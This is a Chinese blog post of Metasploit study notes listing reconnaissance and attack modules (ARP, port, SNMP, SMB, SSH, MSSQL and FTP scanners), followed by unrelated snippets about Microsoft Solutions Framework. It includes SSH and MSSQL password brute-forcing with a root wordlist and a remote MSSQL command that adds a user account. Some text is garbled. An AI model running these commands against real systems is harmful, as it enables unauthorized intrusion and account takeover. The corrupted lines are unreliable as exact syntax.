msf學習筆記(4)

2021-08-10 06:28:42 字數 2476 閱讀 6518

db_nmap -sv 192.168.1.1
rhosts <>rhost

192.168.1.1-24 192.168.1.1/24

files:/root/ip.txt

arp掃瞄

msf > use auxiliary/scanner/discovery/arp_sweep 

set inte***ce ̵ rhosts̵ shost̵ smac̵ threadsҕ run

port掃瞄
use auxiliary/scanner/portscan/syn

set inte***ce̵ ports̵ rhosts̵ threadsҕ run

nmap ipid idle掃瞄
use auxiliary/scanner/ip/ipidseq

set rhosts 192.168

.1.0/24 ҕ run

nmap -pn

-si《掃瞄位址》

udp掃瞄
use auxiliary/scanner/discovery/udp_sweep

use auxiliary/scanner/discovery/udp_probe

use auxiliary/sniffer/psnuffle
use auxiliary/scanner/snmp/snmp_login

use auxiliary/scanner/snmp/snmp_enum

use auxiliary/scanner/snmp/snmp_enumusers (windows)

use auxiliary/scanner/snmp/snmp_enumshares (windows)

smb版本掃瞄

use auxiliary/scanner/smb/smb_version
掃瞄命名管道,判斷smb服務型別(賬號、密碼)

use auxiliary/scanner/smb/pipe_auditor
掃瞄通過smb管道可以訪問的rcerpc服務

use auxiliary/scanner/smb/pipe_dcerpc_auditor
smb共享列舉(賬號、密碼)

use auxiliary/scanner/smb/smb_enumshares
smb使用者列舉(賬號、密碼)

use auxiliary/scanner/smb/smb_enumusers
sid列舉(賬號、密碼)

use auxiliary/scanner/smb/smb_lookupsid
ssh版本掃瞄

use auxiliary/scanner/ssh/ssh_version
smb密碼爆破

use auxiliary/scanner/ssh/ssh_login

set userpass_file /usr/share/metasploit-framework/data/wordlists/

root_userpass.txt ; set verbose false ; run

ssh公鑰登入

use auxiliary/scanner/ssh/ssh_login_pubkey

set key_file id_rsa;set username root ;run

基於已經取得的session進行檢測

use post/windows/gather/enum_patches

show advanced

set verbose yes

mssql掃瞄埠

tcp1433(動態埠)/udp1434(查詢tcp埠號)

use auxiliary/scanner/mssql/mssql_ping

爆破mssql密碼

use auxiliary/scanner/mssql/mssql_login
遠端執行**

auxiliary/admin/mssql/mssql_exec

set cmd net user

user pass /add

版本掃瞄

use auxiliary/scanner/ftp/ftp_version

use auxiliary/scanner/ftp/anonymous

use auxiliary/scanner/ftp/ftp_login

MSF學習筆記

貴有恆何必三更眠五更起,最無益只怕一日曝十日寒 話不多說,上乾貨。滲透模組 exploit 執行時會利用目標主機漏洞進行攻擊。攻擊載荷模組 payload 在成功對目標完成一次滲透之後,這段程式開始在目標主機上執行,幫助我們獲取需要的訪問和行動許可權。輔助模組 auxiliary 包含一系列輔助支援...

微軟MSF框架學習筆記 1

解決方案框架簡介 it 的首要目標不是更多的技術而是將其主要力量 豐富的技術知識 同人和過程結合起來,為整個組織服務。msf 二個模型三個準則 技巧 先完成軟體的規格說明書,然後再進行開發 整個軟體開發過程 計畫 構造 部署 運營 計畫。計畫 構造和部署組成msf框架的範疇 運營屬於mof框架的範疇...

微軟MSF框架學習筆記 3

msf團隊角色 程式管理角色 專案管理 解決方案體系結構 過程管理 管理服務 目標 按照專案約束交付解決方案 發起人 維護人 策劃者 管理者 開發技術諮詢 體系結構和方案設計 應用程式開發 基礎架構開發 目標 根據規格說明書構建解決方案 從無到有 更改問題bug 測試測試計畫 測試實施 測試報告 目...